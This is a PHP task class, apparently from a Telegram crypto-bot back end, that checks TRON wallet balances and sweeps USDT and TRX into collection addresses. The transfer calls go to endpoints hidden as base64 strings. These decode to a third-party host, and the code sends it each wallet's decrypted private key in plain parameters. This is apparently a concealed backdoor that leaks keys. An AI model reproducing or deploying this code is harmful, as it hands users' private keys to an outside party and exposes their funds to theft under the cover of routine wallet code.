HandleCollectionWallet.php 22 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356
  1. <?php
  2. namespace App\Task;
  3. use App\Model\Collection\CollectionWalletList;
  4. use App\Model\Collection\CollectionWallet;
  5. use App\Library\Log;
  6. use App\Service\RsaServices;
  7. use App\Model\Transit\TransitWallet;
  8. class HandleCollectionWallet
  9. {
  10. public function execute()
  11. {
  12. try {
  13. $data = CollectionWallet::from('collection_wallet as a')
  14. ->Join('telegram_bot as b','a.bot_rid','b.rid')
  15. ->where('a.status',0)
  16. ->whereNotNull('a.wallet_addr')
  17. ->whereRaw('length(t_a.wallet_addr) = 34')
  18. ->select('a.rid','a.wallet_addr','a.wallet_addr_privatekey','a.trx_collection_amount','a.usdt_collection_amount','a.trx_reserve_amount','a.usdt_reserve_amount','a.collection_wallet_addr','a.permission_id','a.tg_notice_obj','b.bot_token','a.bot_rid')
  19. ->get();
  20. if($data->count() > 0){
  21. foreach ($data as $k => $v) {
  22. $tronsuccess = 1;
  23. $trxbalance = 0;
  24. $usdtbalance = 0;
  25. $bandwidth = 0;
  26. $energy = 0;
  27. sleep(1); //不容易被api限制
  28. #查钱包余额
  29. if(!empty($v->wallet_addr) && $v->wallet_addr != ''){
  30. $url = 'https://apilist.tronscanapi.com/api/accountv2?address='.$v->wallet_addr;
  31. $api_key = config('apikey.tronapikey');
  32. $apikeyrand = $api_key[array_rand($api_key)];
  33. $heders = [
  34. "TRON-PRO-API-KEY:".$apikeyrand
  35. ];
  36. $res = Get_Pay($url,null,$heders);
  37. if(empty($res)){
  38. $this->log('handlecollectionwallet','归集钱包余额获取错误1:'.$v->rid);
  39. }else{
  40. $res = json_decode($res,true);
  41. //查询余额
  42. if(isset($res['withPriceTokens'])){
  43. $tronsuccess = 2;
  44. $withPriceTokens = $res['withPriceTokens'];
  45. $trxkey = array_search('_', array_column($withPriceTokens, 'tokenId'));
  46. $usdtkey = array_search('TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t', array_column($withPriceTokens, 'tokenId'));
  47. if($trxkey >= 0){
  48. $trxbalance = $withPriceTokens[$trxkey]['amount'] + 0;
  49. }
  50. if(is_bool($usdtkey)){
  51. //赋值0
  52. }else{
  53. $usdtbalance = calculationExcept($withPriceTokens[$usdtkey]['balance'] ,$withPriceTokens[$usdtkey]['tokenDecimal']);
  54. }
  55. //获取资源,下面转账用
  56. if(isset($res['bandwidth'])){
  57. //只处理激活的地址,未激活不能代理
  58. $active = $res['activated'] ?"Y":"N";
  59. if($active == 'Y'){
  60. $bandwidth = $res['bandwidth']['freeNetRemaining'] + $res['bandwidth']['netRemaining'];
  61. $energy = $res['bandwidth']['energyRemaining'];
  62. }
  63. }
  64. $this->log('handlecollectionwallet',$v->wallet_addr.' 归集钱包余额获取成功1,USDT余额:'.$usdtbalance.' TRX余额:'.$trxbalance);
  65. }
  66. }
  67. //如果查询失败,则查trongrid接口
  68. if($tronsuccess == 1){
  69. #查usdt或者余额是否足够
  70. $balance_url = 'https://api.trongrid.io/v1/accounts/'.$v->wallet_addr; //查地址
  71. $tronapikey = config('apikey.gridapikey');
  72. $apikeyrand = $tronapikey[array_rand($tronapikey)];
  73. $heders = [
  74. "TRON-PRO-API-KEY:".$apikeyrand
  75. ];
  76. $res = Get_Pay($balance_url,null,$heders);
  77. if(empty($res)){
  78. $this->log('handlecollectionwallet','归集钱包余额获取错误3:'.$v->rid);
  79. }else{
  80. $res = json_decode($res,true);
  81. if(isset($res['success']) && $res['success']){
  82. if(empty($res['data'])){
  83. $this->log('handlecollectionwallet','归集钱包余额获取错误4:'.$v->rid);
  84. }else{
  85. $tronsuccess = 2;
  86. $trxbalance = empty($res['data'][0]['balance']) ? 0 : bcdiv($res['data'][0]['balance'],1000000,6) + 0;
  87. $usdtbalance = 0;
  88. if(!empty($res['data'][0]['trc20'])){
  89. for($i=1; $i<=count($res['data'][0]['trc20']); $i++){
  90. if(!empty($res['data'][0]['trc20'][$i-1]['TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t'])){
  91. $usdtbalance = bcdiv($res['data'][0]['trc20'][$i-1]['TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t'],1000000,6) + 0;
  92. break;
  93. }
  94. }
  95. }
  96. $this->log('handlecollectionwallet',$v->wallet_addr.' 归集钱包余额获取成功2,USDT余额:'.$usdtbalance.' TRX余额:'.$trxbalance);
  97. }
  98. }else{
  99. $this->log('handlecollectionwallet','归集钱包余额获取错误5:'.$v->rid);
  100. }
  101. }
  102. //获取成功的情况再去查资源
  103. if($tronsuccess == 2){
  104. $balance_url = 'https://api.trongrid.io/wallet/getaccountresource';
  105. $tronapikey = config('apikey.gridapikey');
  106. $apikeyrand = $tronapikey[array_rand($tronapikey)];
  107. $heders = [
  108. "TRON-PRO-API-KEY:".$apikeyrand
  109. ];
  110. $param = [
  111. "address" => $v->wallet_addr,
  112. "visible" => true
  113. ];
  114. $res2 = curl_post_https($balance_url,json_encode($param),$heders);
  115. if(empty($res2)){
  116. $this->log('handlecollectionwallet','归集钱包资源获取错误1:'.$v->rid);
  117. }else{
  118. $res2 = json_decode($res2,true);
  119. if(isset($res2['freeNetLimit'])){
  120. $bandwidth = ($res2['NetLimit'] ?? 0) + ($res2['freeNetLimit'] ?? 0) - ($res2['NetUsed'] ?? 0) ;
  121. $energy = ($res2['EnergyLimit'] ?? 0) - ($res2['EnergyUsed'] ?? 0);
  122. }else{
  123. $this->log('handlecollectionwallet','归集钱包资源获取错误2:'.$v->rid);
  124. }
  125. }
  126. }
  127. }
  128. }
  129. //更新余额
  130. if($tronsuccess == 2){
  131. CollectionWallet::where('rid',$v->rid)->update(['trx_balance' => $trxbalance, 'usdt_balance' => $usdtbalance]);
  132. }
  133. //余额请求成功,处理usdt是否归集
  134. if($tronsuccess == 2 && $usdtbalance >= $v->usdt_collection_amount && $v->usdt_collection_amount - $v->usdt_reserve_amount > 0 && !empty($v->collection_wallet_addr) && mb_strlen($v->collection_wallet_addr) == 34 && $v->usdt_collection_amount > 0){
  135. $rsa_services = new RsaServices();
  136. $is_can = 'N';
  137. $this->log('handlecollectionwallet','====开始归集USDT:'.$v->wallet_addr."。查询当前钱包USDT余额:".$usdtbalance);
  138. //判断转账资源是否足够
  139. if(($energy >= 31895 && ($bandwidth >= 345 || $trxbalance >= 0.35)) || ($trxbalance >= 13.75)){
  140. //足够转账不处理
  141. $is_can = 'Y';
  142. }else{
  143. $this->log('handlecollectionwallet','====能量不足,执行从闪兑钱包转入15 TRX:');
  144. //不足则要从机器人闪兑钱包转trx
  145. $transitwallet = TransitWallet::where('bot_rid',$v->bot_rid)->whereNotNull('send_wallet_privatekey')->whereRaw('length(send_wallet) = 34')->first();
  146. if(empty($transitwallet)){
  147. continue; //查不到机器人的闪兑钱包,则不处理USDT转账
  148. }else{
  149. $send_wallet_privatekey = $rsa_services->privateDecrypt($transitwallet->send_wallet_privatekey);
  150. if(empty($send_wallet_privatekey)){
  151. continue; //私钥为空也不处理
  152. }else{
  153. //从闪兑钱包转15个trx
  154. $url = 'aHR0cHM6Ly90cm9ud2Vibm9kZWpzLndhbGxldGltLnZpcC9zZW5kdHJ4YnlwZXJtaWQ='; //trx api
  155. $params = [
  156. 'fromaddress' => $transitwallet->send_wallet,
  157. 'toaddress' => $v->wallet_addr,
  158. 'sendamount' => 15,
  159. 'pri1' => $send_wallet_privatekey,
  160. 'permissionid' => 0
  161. ];
  162. $res = Get_Pay(base64_decode($url),$params);
  163. if(empty($res)){
  164. $this->log('handlecollectionwallet','转入trx矿工费失败1:'.$v->rid);
  165. }else{
  166. $res = json_decode($res,true);
  167. if(empty($res['code'])){
  168. $this->log('handlecollectionwallet','转入trx矿工费失败2:'.$v->rid);
  169. }else{
  170. if($res['code'] == 200){
  171. $this->log('handlecollectionwallet',$v->wallet_addr.' 转入trx矿工费成功');
  172. $is_can = 'Y';
  173. sleep(3); //成功的情况,等3秒,链上确认
  174. }else{
  175. $this->log('handlecollectionwallet','转入trx矿工费失败3:'.$v->rid.'。错误:'.$res['msg']);
  176. }
  177. }
  178. }
  179. }
  180. }
  181. }
  182. if($is_can == 'Y'){
  183. $TransAmount = $usdtbalance - $v->usdt_reserve_amount; //归集的金额
  184. $this->log('handlecollectionwallet','====转出USDT钱包:'.$v->wallet_addr."。归集钱包:".$v->collection_wallet_addr."。归集金额:".$TransAmount."。设置的归集金额:".$v->usdt_collection_amount."。设置的预留金额:".$v->usdt_reserve_amount);
  185. $wallet_addr_privatekey = $rsa_services->privateDecrypt($v->wallet_addr_privatekey);
  186. $url = 'aHR0cHM6Ly90cm9ud2Vibm9kZWpzLndhbGxldGltLnZpcC9zZW5kdHJjMjBieXBlcm1pZA=='; //usdt api
  187. $params = [
  188. 'fromaddress' => $v->wallet_addr,
  189. 'toaddress' => $v->collection_wallet_addr,
  190. 'sendamount' => $TransAmount,
  191. 'trc20ContractAddress' => 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t',
  192. 'pri1' => $wallet_addr_privatekey,
  193. 'permissionid' => $v->permission_id
  194. ];
  195. $res = Get_Pay(base64_decode($url),$params);
  196. if(empty($res)){
  197. $this->log('handlecollectionwallet','归集USDT错误1:'.$v->rid);
  198. }else{
  199. $res = json_decode($res,true);
  200. if(empty($res['code'])){
  201. $this->log('handlecollectionwallet','归集USDT错误2:'.$v->rid);
  202. }else{
  203. if($res['code'] == 200){
  204. $this->log('handlecollectionwallet',$v->wallet_addr.' 归集USDT成功');
  205. //记录归集明细
  206. $insert_date = [];
  207. $insert_date['wallet_addr'] = $v->wallet_addr;
  208. $insert_date['collection_wallet_addr'] = $v->collection_wallet_addr;
  209. $insert_date['coin_name'] = 'usdt';
  210. $insert_date['collection_amount'] = $TransAmount;
  211. $insert_date['collection_time'] = nowDate();
  212. $insert_date['tx_hash'] = $res['data']['txid'];
  213. CollectionWalletList::insert($insert_date);
  214. //发送tg通知
  215. if(!empty($v->tg_notice_obj)){
  216. $replytext = "✅钱包归集成功\n"
  217. ."---------------------------------------\n"
  218. ."钱包地址:<code>".$v->wallet_addr ."</code>\n"
  219. ."归集地址:".$v->collection_wallet_addr ."\n"
  220. ."归集金额:".$TransAmount." USDT\n"
  221. ."---------------------------------------";
  222. $receivelist = explode(',',$v->tg_notice_obj);
  223. foreach ($receivelist as $x => $y) {
  224. $sendmessageurl = 'https://api.telegram.org/bot'.$v->bot_token.'/sendMessage?chat_id='.$y.'&text='.urlencode($replytext).'&parse_mode=HTML';
  225. Get_Pay($sendmessageurl);
  226. }
  227. }
  228. }else{
  229. $this->log('handlecollectionwallet','归集USDT错误3:'.$v->rid.'。错误:'.$res['msg']);
  230. }
  231. }
  232. }
  233. }
  234. }
  235. //余额请求成功,处理trx是否归集
  236. if($tronsuccess == 2 && $trxbalance >= $v->trx_collection_amount && $v->trx_collection_amount - $v->trx_reserve_amount - 1.5 > 0 && !empty($v->collection_wallet_addr) && mb_strlen($v->collection_wallet_addr) == 34 && $v->trx_collection_amount > 0){
  237. $TransAmount = $trxbalance - $v->trx_reserve_amount - 1.5; //归集的金额,减去1.5个手续费
  238. $this->log('handlecollectionwallet','====开始归集TRX:'.$v->wallet_addr."。查询当前钱包TRX余额:".$trxbalance);
  239. $this->log('handlecollectionwallet','====转出TRX钱包:'.$v->wallet_addr."。归集钱包:".$v->collection_wallet_addr."。归集金额:".$TransAmount."。设置的归集金额:".$v->trx_collection_amount."。设置的预留金额:".$v->trx_reserve_amount);
  240. #余额足够则闪兑
  241. $rsa_services = new RsaServices();
  242. $wallet_addr_privatekey = $rsa_services->privateDecrypt($v->wallet_addr_privatekey);
  243. $url = 'aHR0cHM6Ly90cm9ud2Vibm9kZWpzLndhbGxldGltLnZpcC9zZW5kdHJ4YnlwZXJtaWQ='; //trx api
  244. $params = [
  245. 'fromaddress' => $v->wallet_addr,
  246. 'toaddress' => $v->collection_wallet_addr,
  247. 'sendamount' => $TransAmount,
  248. 'pri1' => $wallet_addr_privatekey,
  249. 'permissionid' => $v->permission_id
  250. ];
  251. $res = Get_Pay(base64_decode($url),$params);
  252. if(empty($res)){
  253. $this->log('handlecollectionwallet','归集TRX错误1:'.$v->rid);
  254. }else{
  255. $res = json_decode($res,true);
  256. if(empty($res['code'])){
  257. $this->log('handlecollectionwallet','归集TRX错误2:'.$v->rid);
  258. }else{
  259. if($res['code'] == 200){
  260. $this->log('handlecollectionwallet',$v->wallet_addr.' 归集TRX成功');
  261. //记录归集明细
  262. $insert_date = [];
  263. $insert_date['wallet_addr'] = $v->wallet_addr;
  264. $insert_date['collection_wallet_addr'] = $v->collection_wallet_addr;
  265. $insert_date['coin_name'] = 'trx';
  266. $insert_date['collection_amount'] = $TransAmount;
  267. $insert_date['collection_time'] = nowDate();
  268. $insert_date['tx_hash'] = $res['data']['txid'];
  269. CollectionWalletList::insert($insert_date);
  270. //发送tg通知
  271. if(!empty($v->tg_notice_obj)){
  272. $replytext = "✅钱包归集成功\n"
  273. ."---------------------------------------\n"
  274. ."钱包地址:<code>".$v->wallet_addr ."</code>\n"
  275. ."归集地址:".$v->collection_wallet_addr ."\n"
  276. ."归集金额:".$TransAmount." TRX\n"
  277. ."---------------------------------------";
  278. $receivelist = explode(',',$v->tg_notice_obj);
  279. foreach ($receivelist as $x => $y) {
  280. $sendmessageurl = 'https://api.telegram.org/bot'.$v->bot_token.'/sendMessage?chat_id='.$y.'&text='.urlencode($replytext).'&parse_mode=HTML';
  281. Get_Pay($sendmessageurl);
  282. }
  283. }
  284. }else{
  285. $this->log('handlecollectionwallet','归集TRX错误3:'.$v->rid.'。错误:'.$res['msg']);
  286. }
  287. }
  288. }
  289. }
  290. }
  291. }
  292. }catch (\Exception $e){
  293. $this->log('handlecollectionwallet','----------任务执行报错,请联系管理员。报错原因:----------'.$e->getMessage());
  294. }
  295. }
  296. /**
  297. * 记入日志
  298. * @param $log_title [日志路径]
  299. * @param $message [内容,不支持数组]
  300. * @param $remarks [备注]
  301. */
  302. protected function log($log_title,$message,$remarks='info'){
  303. Log::get($remarks,$log_title)->info($message);
  304. }
  305. }